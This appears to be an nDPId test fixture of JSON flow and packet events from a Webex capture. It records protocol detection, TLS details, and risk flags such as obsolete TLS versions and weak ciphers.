-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1444570679512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570679512,"pkt":"ABoRAAACABoRAAABCABFAAA8dLdAAEAGDZsKCAABrfMAbtl1Abugj6duAAAAAKACOQhfOgAAAgQFtAQCCAoATNPZAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1444570679516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAoAphAABAGr86t8wBuCggAAQG72XVfcFiRoI+nb1AS\/\/8cNwAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1444570679516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAodLhAAEAGDa4KCAABrfMAbtl1Abugj6dvX3BYklAQOQjjLwAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"thread_ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570693238,"flow_last_seen":1444570693238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570693238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1444570693238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570693238,"pkt":"ABoRAAACABoRAAABCABFAAA8LOJAAEAGVXAKCAABrfMAbtl3AbsPD\/XWAAAAAKACOQic9QAAAgQFtAQCCAoATNk0AAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1444570693244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693244,"pkt":"ABoRAAACABoRAAABCABFAAAoAxBAABAGr1at8wBuCggAAQG72Xfw8AopDw\/111AS\/\/8cNQAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1444570693245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693245,"pkt":"ABoRAAACABoRAAABCABFAAAoLONAAEAGVYMKCAABrfMAbtl3AbsPD\/XX8PAKKlAQOQjjLQAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570694561,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570694561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570694561,"pkt":"ABoRAAACABoRAAABCABFAAA802lAAEAGOT4KCAABPm3lnsp\/AbubwQrQAAAAAKACOQiUEgAAAgQFtAQCCAoATNm5AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1444570694564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAoAytAABAGOZE+beWeCggAAQG7yn9kPvUvm8EK0VAS\/\/+1ggAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1444570694564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAo02pAAEAGOVEKCAABPm3lnsp\/AbubwQrRZD71MFAQOQh8ewAA"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699074,"flow_last_seen":1444570699074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699074,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1444570699074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699074,"pkt":"ABoRAAACABoRAAABCABFAAA8OjpAAEAGn3oKCAABNvEgDrSDAbvRQeFHAAAAAKACOQhpXwAAAgQFtAQCCAoATNt9AAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1444570699077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoA2VAABAGBmQ28SAOCggAAQG7tIMuvh640UHhSFAS\/\/+YiwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1444570699077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoOjtAAEAGn40KCAABNvEgDrSDAbvRQeFILr4euVAQOQhfhAAA"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699096,"flow_last_seen":1444570699096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699096,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1444570699096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699096,"pkt":"ABoRAAACABoRAAABCABFAAA8731AAEAGBawKCAABTi7tW+lsAFBr3TT9AAAAAKACOQhjAgAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1444570699101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAAoA2dAABAGIddOLu1bCggAAQBQ6WyUIssCa900\/lAS\/\/+AggAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1237,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699101,"flow_last_seen":1444570699101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699101,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1444570699101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAA8ZgxAAEAGjx0KCAABTi7tW+ltAFASyr2MAAAAAKACOQgzhQAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1444570699106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699106,"pkt":"ABoRAAACABoRAAABCABFAAAoA2hAABAGIdZOLu1bCggAAQBQ6W3tNUJzEsq9jVAS\/\/+AgQAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAo735AAEAGBb8KCAABTi7tW+lsAFBr3TT+lCLLA1AQOQhHewAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAoZg1AAEAGjzAKCAABTi7tW+ltAFASyr2N7TVCdFAQOQhHegAA"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} -00849{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1243,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699096,"flow_last_seen":1444570699202,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1444570699202,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -01349{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699916,"flow_last_seen":1444570699916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699916,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1444570699916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699916,"pkt":"ABoRAAACABoRAAABCABFAAA8M+lAAEAGPjwKCAABUEpuRIMPAbsBc+gmAAAAAKACOQj74QAAAgQFtAQCCAoATNvPAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1444570699917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoA3lAABAGnsBQSm5ECggAAQG7gw\/+jBfZAXPoJ1AS\/\/9icAAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1444570699917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoM+pAAEAGPk8KCAABUEpuRIMPAbsBc+gn\/owX2lAQOQgpaQAA"} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 